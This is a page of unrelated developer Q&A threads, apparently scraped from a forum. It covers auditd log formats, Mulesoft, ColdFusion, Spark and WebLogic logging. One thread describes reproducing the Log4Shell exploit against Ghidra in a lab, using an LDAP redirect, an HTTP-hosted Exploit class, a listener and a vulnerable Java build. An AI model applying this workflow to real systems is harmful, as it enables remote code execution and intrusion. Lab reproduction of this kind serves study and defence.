Auditd dispatcher event parsing failed in RHEL 8/ CENTOS 8 - audit

I have written a parser to parse audit events through the dispatcher plugin. For CentOS 8 or RHEL 8, my parser fails to parse the audit events as the events are coming in different formats. It has some extra parameters appended at the end of the events.

Found the issue, the issue was with the audit.conf entry, for centos8 or rhel8 there is a new config introduced log_format = ENRICHED. Make ENRICHED to RAW would give the events as before, or update the parser if required for using ENRICHED.
man page of audit.conf says -
The ENRICHED option will resolve all uid,
gid, syscall, architecture, and socket address information
before writing the event to disk. This aids in making sense of
events created on one system but reported/analyzed on another
system.

Related

log4shell POC : no HTTP redirect

I am trying to understand/reproduce Log4shell vulnerability, using this poc and also information from Marshalsec.
To do that, I've downloaded Ghidra v10.0.4, which is said (on Ghidra download page) to be vulnerable to log4shell. Installed it on an ubuntu VM, along with java 1.8 (as stated in POC), and loaded the Poc + marshalsec snapshot.
Tried to start Ghidra, it said java 11 was needed, so although I've installed java 1.8 I still downloaded java 11 and, when you start ghidra, it says the installed version is not good enough and ask for the path to a java11 version; so I just gave him path to the jdk11 directory and it seems happy with it. Ghidra starts alright.
Then set up my listener and launched the poc, got the payload string to copy/paste in ghidra, and got a response in the ldap listener saying it'll send it to HTTP. But nothing more. The end.
Since the HTTP server is set up by the same POC, I thought maybe I just couldn't see the redirection, so I started the http server myself, started the ldap server myself with marshalsec, and retried (see pics below for exact commands/outputs).
Setting http server:
Set listener:
Setting LDAP server:
Send payload string in Ghidra (in the help/search part, as shown in kozmer POC); immediately got an answer:
I still receive a response on the LDAP listener (two, in fact, which seems weird), but nothing on the HTTP. The the Exploit class is never loaded in ghidra (it directly sends me a pop-up saying search not found, I think it is supposed to wait for the server answer to do that?), and I get nothing back in my listener.
Note that I don't really understand this Marshalsec/LDAP thing so I'm not sure what's happening here. If anyone have time to explain it will be nice. I've read lot of stuff about the vuln but it rarely goes deeply into details (most is like: the payload string send a request to LDAP server, which redirect to HTTP server, which will upload the Exploit class on the vulnerable app and gives you a shell).
Note: I've checked, the http server is up and accessible, the Exploit.class file is here and can be downloaded.
Solved it.
Turned out for log4shell to work you need a vulnerable app and a vulnerable version of Java; which I thought I had, but nope. I had Java 11.0.15, and needed Java 11 (Ghidra need Java 11 minimum, only vulnerable version of Java 11 is the first one).
Downloaded and installed Java 11, POC working perfectly.

SO_KEEPALIVE issue in Mulesoft

we had a Mulesoft app that basically picks message from queue (ActiveMQ), then posts to target app via HTTP request to target's API.
Runtime: 4.3.0
HTTP Connector version: v1.3.2
Server: Windows, On-premise standalone
However, sometimes the message doesn't get sent successfully after picking from queue , and below message can be found in the log -
WARN 2021-07-10 01:24:46,080 [[masked-app].http.requester.requestConfig.02 SelectorRunner] [event: ] org.glassfish.grizzly.nio.transport.TCPNIOTransport: GRIZZLY0005: Can not set SO_KEEPALIVE to false
java.net.SocketException: Invalid argument: no further information
at sun.nio.ch.Net.setIntOption0(Native Method) ~[?:1.8.0_281]
The flow completed silently without any error after above message, hence no error handling happens.
I found this mentioning it is a known bug on Windows server and won’t affect the well behavior of the application, but the document is failing to set SO_KEEPALIVE to true rather than false.
Looks the message didn't get posted successfully as the target system team can't find corresponding incoming request in their log.
It is not acceptable as the message is critical and no one knows unless the target system realizes something is wrong... Not sure if the SO_KEEPALIVE is failing to be set to false is the root cause, could you please share some thoughts? Thanks a lot in advance.
The is probably unrelated to the warning you mentioned but there doesn't seem to be enough information to identify the actual root cause.
Having said that the version of the HTTP connector is old and it's missing almost 3 years of fixes. Updating the version to the last one should improve the reliability of the application.

ColdFusion 2018 - Requests Multiply Executed

with a new project we encountered some strange behaviour on our ColdFusion application.
Whenever a single request is initiated from the browser, the code of the cfml-templates is
executed multiple times. Upon viewing the corresponding log-files we found out, that indeed
for some reason the same request fires the evaluation in our application multiple times. One request
generates several entries. This is especially the case for long-running requests, such as database imports.
The ColdFusion application implements a REST-service, but even on manually requesting a resource,
such as a certain cfml page, on the same application - the code gets executed an unknown amount of times(variable initializations, database write-operations etc. take place), and if the request runs too long (cap at around ~4-6 seconds) there is no response to the browser.
About the infrastructure:
The application is Coldfusion18 with Tomcat Standard Edition
The webserver is an Apache (2.4.6).
Everything runs on a Linux machine with Cent OS 7.7
The corresponding Java version is 11.0.4
Our best guess is that there might be some misscommunication between the coldfusion connector with
the apache webserver. We actually searched for some configuration parameters that could cause the
problem, without success. Upon an installation on a windows machine we did not encounter that error.
Anyone got any idea?
we just found our answer in the following post:
Link to Solution

How to submit code to a remote Spark cluster from IntelliJ IDEA

I have two clusters, one in local virtual machine another in remote cloud. Both clusters in Standalone mode.
My Environment:
Scala: 2.10.4
Spark: 1.5.1
JDK: 1.8.40
OS: CentOS Linux release 7.1.1503 (Core)
The local cluster:
Spark Master: spark://local1:7077
The remote cluster:
Spark Master: spark://remote1:7077
I want to finish this:
Write codes(just simple word-count) in IntelliJ IDEA locally(on my laptp), and set the Spark Master URL to spark://local1:7077 and spark://remote1:7077, then run my codes in IntelliJ IDEA. That is, I don't want to use spark-submit to submit a job.
But I got some problem:
When I use the local cluster, everything goes well. Run codes in IntelliJ IDEA or use spark-submit can submit job to cluster and can finish the job.
But When I use the remote cluster, I got a warning log:
TaskSchedulerImpl: Initial job has not accepted any resources; check your cluster UI to ensure that workers are registered and have sufficient resources
It is sufficient resources not sufficient memory!
And this log keep printing, no further actions. Both spark-submit and run codes in IntelliJ IDEA result the same.
I want to know:
Is it possible to submit codes from IntelliJ IDEA to remote cluster?
If it's OK, does it need configuration?
What are the possible reasons that can cause my problem?
How can I handle this problem?
Thanks a lot!
Update
There is a similar question here, but I think my scene is different. When I run my codes in IntelliJ IDEA, and set Spark Master to local virtual machine cluster, it works. But I got Initial job has not accepted any resources;... warning instead.
I want to know whether the security policy or fireworks can cause this?
Submitting code programatically (e.g. via SparkSubmit) is quite tricky. At the least there is a variety of environment settings and considerations -handled by the spark-submit script - that are quite difficult to replicate within a scala program. I am still uncertain of how to achieve it: and there have been a number of long running threads within the spark developer community on the topic.
My answer here is about a portion of your post: specifically the
TaskSchedulerImpl: Initial job has not accepted any resources; check
your cluster UI to ensure that workers are registered and have
sufficient resources
The reason is typically there were a mismatch on the requested memory and/or number of cores from your job versus what were available on the cluster. Possibly when submitting from IJ the
$SPARK_HOME/conf/spark-defaults.conf
were not properly matching the parameters required for your task on the existing cluster. You may need to update:
spark.driver.memory 4g
spark.executor.memory 8g
spark.executor.cores 8
You can check the spark ui on port 8080 to verify that the parameters you requested are actually available on the cluster.

How to use java.util.logging in Weblogic?

I have an application that was migrated from Glassfish to Weblogic, and it uses java.util.logging as logging framework.
The only way I have found to make the logs work is by editing the logging.properties file of the JVM and restart the server. This solution is awkward and gives problems because the log is written to a different file than the standard ones for weblogic, so we have to look at too many files for a log in a clustered environment. Besides, for some reason this does not work on some Windows systems.
Is there a way to keep using standard java logging to write messages to weblogic's standard log files? I tried the instructions on this page but it doesn't work either.
WebLogic Server ships with a JDK logging handler which will pick up log messages emitted from JDK logging framework and direct them into the WebLogic Server logging system.
Set the default logging level for new ServerLoggingHandler instances in logging.properties as well as adding the ServerLoggingHandler to the handlers.
handlers = weblogic.logging.ServerLoggingHandler
weblogic.logging.ServerLoggingHandler.level = ALL
http://docs.oracle.com/cd/E14571_01/web.1111/e13739/logging_services.htm#CHDBBEIJ
To direct the JDK logging framework to use the logging.properties file, the standard System property java.util.logging.config.file is used. With WebLogic Server, this can be easily accomplished by setting the JAVA_OPTIONS System property with the corresponding value.
$ export JAVA_OPTIONS="-Djava.util.logging.config.file=/Users/xxx/Projects/Domains/wls1035/logging.properties"
Some more hints here: http://buttso.blogspot.de/2011/06/using-slf4j-with-weblogic-server.html